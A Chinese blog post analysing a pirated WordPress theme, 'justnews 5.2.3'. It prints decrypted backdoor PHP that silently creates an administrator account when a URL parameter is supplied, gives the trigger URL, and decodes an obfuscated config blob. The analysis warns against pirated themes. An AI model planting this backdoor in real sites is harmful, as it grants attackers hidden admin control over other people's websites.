最新公告
  • 欢迎您光临笨羊博客,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
  • 网传justnews 5.2.3破解版后门分析

    下载了网友分享的justnews 5.2.3,我们用D盾来扫描下,这里看到有2个可疑文件

    justnews 5.2.3破解版

    functions.php文件解密后再48-61行发现后门代码(解密方法请看另一篇文章:杂谈:优秀的php解密网站和工具网站推荐 干货)

    add_action(‘wp_head’, ‘wp_backdoor’);
    
    function wp_backdoor()
    
    {
    
      if (
    
        md5($_GET[‘backdoor’]) == ’34d1f91fb2e514b8576fab1a75a89a6b’
    
      ) {
    
        require(‘wp-includes/registration.php’);
    
        if (!username_exists(‘backdoor’)) {
    
          $user_id = wp_create_user(‘backdoor’, ‘123456’);
    
          $user = new WP_User($user_id);
    
          $user->set_role(‘administrator’);
    
        }
    
      }
    
    }

     

    这里连backdoor这么明显的后门变量命名都不改。

    使用http(s)://你的域名/?backdoor=go访问,

    自动创建用户名为backdoor密码为123456的管理员账户

    justnews 5.2.3破解版[qgg_green]

    panel.php文件解密后在285-289行发现一段加密代码

    $ops = ‘Y2FlOWYyOGNlODljMDZmYWNjZjg4YWFjZDE3MDc0MTZleUprYjIxaGFXNGlPaUozZDNjdWFHOXZibVYzY3k1dVpYUWlMQ0oyWlhKemFXOXVJam9pTkM0d0xqUWlMQ0p3YkhWbmFXNGlPbHQ3SW01aGJXVWlPaUpYVUMxUWIzTjBWbWxsZDNNaUxDSnpiSFZuSWpvaWQzQXRjRzl6ZEhacFpYZHpJaXdpY21WeGRXbHlaV1FpT21aaGJITmxmVjBzSW1SbGJXOGlPbHQ3SW1sdGNHOXlkRjltYVd4bFgyNWhiV1VpT2lKS2RYTjBUbVYzY3lJc0ltTmhkR1ZuYjNKcFpYTWlPbnNpWkNJNklseDFPV1ZrT0Z4MU9HSmhOQ0o5TENKcGJYQnZjblJmWm1sc1pWOTFjbXdpT2lKb2RIUndPbHd2WEM5M2QzY3VkM0JqYjIwdVkyNWNMMlJ2ZDI1Y0wzQnNkV2RwYmkxbWFXeGxjMXd2WkdWdGIzTmNMMnAxYzNSdVpYZHpYQzlxZFhOMGJtVjNjeTU0Yld3aUxDSnBiWEJ2Y25SZmIzQjBhVzl1YzE5bWFXeGxYM1Z5YkNJNkltaDBkSEE2WEM5Y0wzZDNkeTUzY0dOdmJTNWpibHd2Wkc5M2Jsd3ZjR3gxWjJsdUxXWnBiR1Z6WEM5a1pXMXZjMXd2YW5WemRHNWxkM05jTDJwMWMzUnVaWGR6TG1wemIyNGlMQ0pwYlhCdmNuUmZibTkwYVdObElqb2lYSFUxWW1aalhIVTFNVFkxWEhVMU5EQmxYSFUxTWpBMlhIVTNZemRpU1VSY2RUTXdNREZjZFRrNE56VmNkVGszTmpKSlJGeDFOVE5sWmx4MU9EQm1aRngxTkdZeFlWeDFOVE5rT0Z4MU5UTXhObHgxWm1Zd1kxeDFOR1k0WWx4MU5UazRNbHgxTnpVeU9GeDFOakl6TjF4MU56Wm1PRngxTlRFM00xeDFPVGczTlZ4MU9UYzJNbHgxTlRObFpseDFPREJtWkZ4MU9UY3dNRngxT0RrNE1WeDFPVEZqWkZ4MU5qVmlNRngxTlRJek1DQmNkVFJsTTJKY2RUazRPVGhjZFRoaVltVmNkVGRtTm1VK1hIVTNOVEk0WEhVMk1qTTNYSFUwWlRKa1hIVTFabU16SUZ4MU5HVXdZbHgxT1RjMk1seDFPR0ppWlZ4MU4yWTJaU0o5WFN3aWNtVnhkV2x5WlhNaU9sc2lWME1pWFgwPQ==’;
    
          $ops = base64_decode($ops);
    
          $token = ‘$P$BcGrBU7tfwMR8kZlKzS1OonWpmDU0Y.’;
    
          $ops = base64_decode(str_replace(md5($token), ”, $ops));
    
          $this->_extras = json_decode($ops);

     

    先base64解密(base64_decode($ops))后得到

    cae9f28ce89c06faccf88aacd1707416eyJkb21haW4iOiJ3d3cuaG9vbmV3cy5uZXQiLCJ2ZXJzaW9uIjoiNC4wLjQiLCJwbHVnaW4iOlt7Im5hbWUiOiJXUC1Qb3N0Vmlld3MiLCJzbHVnIjoid3AtcG9zdHZpZXdzIiwicmVxdWlyZWQiOmZhbHNlfV0sImRlbW8iOlt7ImltcG9ydF9maWxlX25hbWUiOiJKdXN0TmV3cyIsImNhdGVnb3JpZXMiOnsiZCI6Ilx1OWVkOFx1OGJhNCJ9LCJpbXBvcnRfZmlsZV91cmwiOiJodHRwOlwvXC93d3cud3Bjb20uY25cL2Rvd25cL3BsdWdpbi1maWxlc1wvZGVtb3NcL2p1c3RuZXdzXC9qdXN0bmV3cy54bWwiLCJpbXBvcnRfb3B0aW9uc19maWxlX3VybCI6Imh0dHA6XC9cL3d3dy53cGNvbS5jblwvZG93blwvcGx1Z2luLWZpbGVzXC9kZW1vc1wvanVzdG5ld3NcL2p1c3RuZXdzLmpzb24iLCJpbXBvcnRfbm90aWNlIjoiXHU1YmZjXHU1MTY1XHU1NDBlXHU1MjA2XHU3YzdiSURcdTMwMDFcdTk4NzVcdTk3NjJJRFx1NTNlZlx1ODBmZFx1NGYxYVx1NTNkOFx1NTMxNlx1ZmYwY1x1NGY4Ylx1NTk4Mlx1NzUyOFx1NjIzN1x1NzZmOFx1NTE3M1x1OTg3NVx1OTc2Mlx1NTNlZlx1ODBmZFx1OTcwMFx1ODk4MVx1OTFjZFx1NjViMFx1NTIzMCBcdTRlM2JcdTk4OThcdThiYmVcdTdmNmU+XHU3NTI4XHU2MjM3XHU0ZTJkXHU1ZmMzIFx1NGUwYlx1OTc2Mlx1OGJiZVx1N2Y2ZSJ9XSwicmVxdWlyZXMiOlsiV0MiXX0=

     

    再以$P$BcGrBU7tfwMR8kZlKzS1OonWpmDU0Y.为密钥MD5加密(md5($token))得到cae9f28ce89c06faccf88aacd1707416

    替换cae9f28ce89c06faccf88aacd1707416为空格,作用等同于删除

    justnews 5.2.3破解版

    得到

    eyJkb21haW4iOiJ3d3cuaG9vbmV3cy5uZXQiLCJ2ZXJzaW9uIjoiNC4wLjQiLCJwbHVnaW4iOlt7Im5hbWUiOiJXUC1Qb3N0Vmlld3MiLCJzbHVnIjoid3AtcG9zdHZpZXdzIiwicmVxdWlyZWQiOmZhbHNlfV0sImRlbW8iOlt7ImltcG9ydF9maWxlX25hbWUiOiJKdXN0TmV3cyIsImNhdGVnb3JpZXMiOnsiZCI6Ilx1OWVkOFx1OGJhNCJ9LCJpbXBvcnRfZmlsZV91cmwiOiJodHRwOlwvXC93d3cud3Bjb20uY25cL2Rvd25cL3BsdWdpbi1maWxlc1wvZGVtb3NcL2p1c3RuZXdzXC9qdXN0bmV3cy54bWwiLCJpbXBvcnRfb3B0aW9uc19maWxlX3VybCI6Imh0dHA6XC9cL3d3dy53cGNvbS5jblwvZG93blwvcGx1Z2luLWZpbGVzXC9kZW1vc1wvanVzdG5ld3NcL2p1c3RuZXdzLmpzb24iLCJpbXBvcnRfbm90aWNlIjoiXHU1YmZjXHU1MTY1XHU1NDBlXHU1MjA2XHU3YzdiSURcdTMwMDFcdTk4NzVcdTk3NjJJRFx1NTNlZlx1ODBmZFx1NGYxYVx1NTNkOFx1NTMxNlx1ZmYwY1x1NGY4Ylx1NTk4Mlx1NzUyOFx1NjIzN1x1NzZmOFx1NTE3M1x1OTg3NVx1OTc2Mlx1NTNlZlx1ODBmZFx1OTcwMFx1ODk4MVx1OTFjZFx1NjViMFx1NTIzMCBcdTRlM2JcdTk4OThcdThiYmVcdTdmNmU+XHU3NTI4XHU2MjM3XHU0ZTJkXHU1ZmMzIFx1NGUwYlx1OTc2Mlx1OGJiZVx1N2Y2ZSJ9XSwicmVxdWlyZXMiOlsiV0MiXX0=

    再base64解密得到

    {“domain”:”www.hoonews.net”,”version”:”4.0.4″,”plugin”:[{“name”:”WP-PostViews”,”slug”:”wp-postviews”,”required”:false}],”demo”:[{“import_file_name”:”JustNews”,”categories”:{“d”:”u9ed8u8ba4″},”import_file_url”:”http://www.wpcom.cn/down/plugin-files/demos/justnews/justnews.xml”,”import_options_file_url”:”http://www.wpcom.cn/down/plugin-files/demos/justnews/justnews.json”,”import_notice”:”u5bfcu5165u540eu5206u7c7bIDu3001u9875u9762IDu53efu80fdu4f1au53d8u5316uff0cu4f8bu5982u7528u6237u76f8u5173u9875u9762u53efu80fdu9700u8981u91cdu65b0u5230 u4e3bu9898u8bbeu7f6e>u7528u6237u4e2du5fc3 u4e0bu9762u8bbeu7f6e”}],”requires”:[“WC”]}

    将unicode替换成中文

    {“domain”:”www.hoonews.net”,”version”:”4.0.4″,”plugin”:[{“name”:”WP-PostViews”,”slug”:”wp-postviews”,”required”:false}],”demo”:[{“import_file_name”:”JustNews”,”categories”:{“d”:”默认”},”import_file_url”:”http://www.wpcom.cn/down/plugin-files/demos/justnews/justnews.xml”,”import_options_file_url”:”http://www.wpcom.cn/down/plugin-files/demos/justnews/justnews.json”,”import_notice”:”导入后分类ID、页面ID可能会变化,例如用户相关页面可能需要重新到 主题设置>用户中心 下面设置”}],”requires”:[“WC”]}

    可以看出这个所谓的justnews 5.2.3破解版,其实本来是4.0.4破解版(由www.hoonews.net传播)而且还被加了后门。

    PS: 在此提醒一下用破解版的诸位,D盾并不能扫描出像这种专门针对WordPress的后门

    D盾对我而言其实主要用来检测加密文件和查杀低级的木马,高级一点的其实很容易绕过查杀。

    所以不要以为用D盾扫一下发现没有报毒就万事无忧了,而且作者真的要针对盗版还是比较容易的。

    比如justnews激活就会将域名发到http://www.wpcom.cn/authentication/,ripro会将设置域名之类的信息发到vip.ylit.cc。

    之前不是说ripro盗版收款收到别人账户上去了吗?是盗版传播者做的,还是其他人做的?细思极恐!

    日PRO主题后门

    建议诸位还是用正版的主题,比较安全!

    张昊翔博客原创文章,作者:,如若转载,请注明出处:
    1、本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
    2、分享目的仅供大家学习和交流,请不要用于商业用途!
    3、本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
    4、如有链接无法下载、失效或广告,请联系管理员处理!
    5、本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!

    笨羊博客 » 网传justnews 5.2.3破解版后门分析

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    笨羊博客
    一个关注网站建设、网站模板、搜索引擎、小程序的媒体博客

    发表评论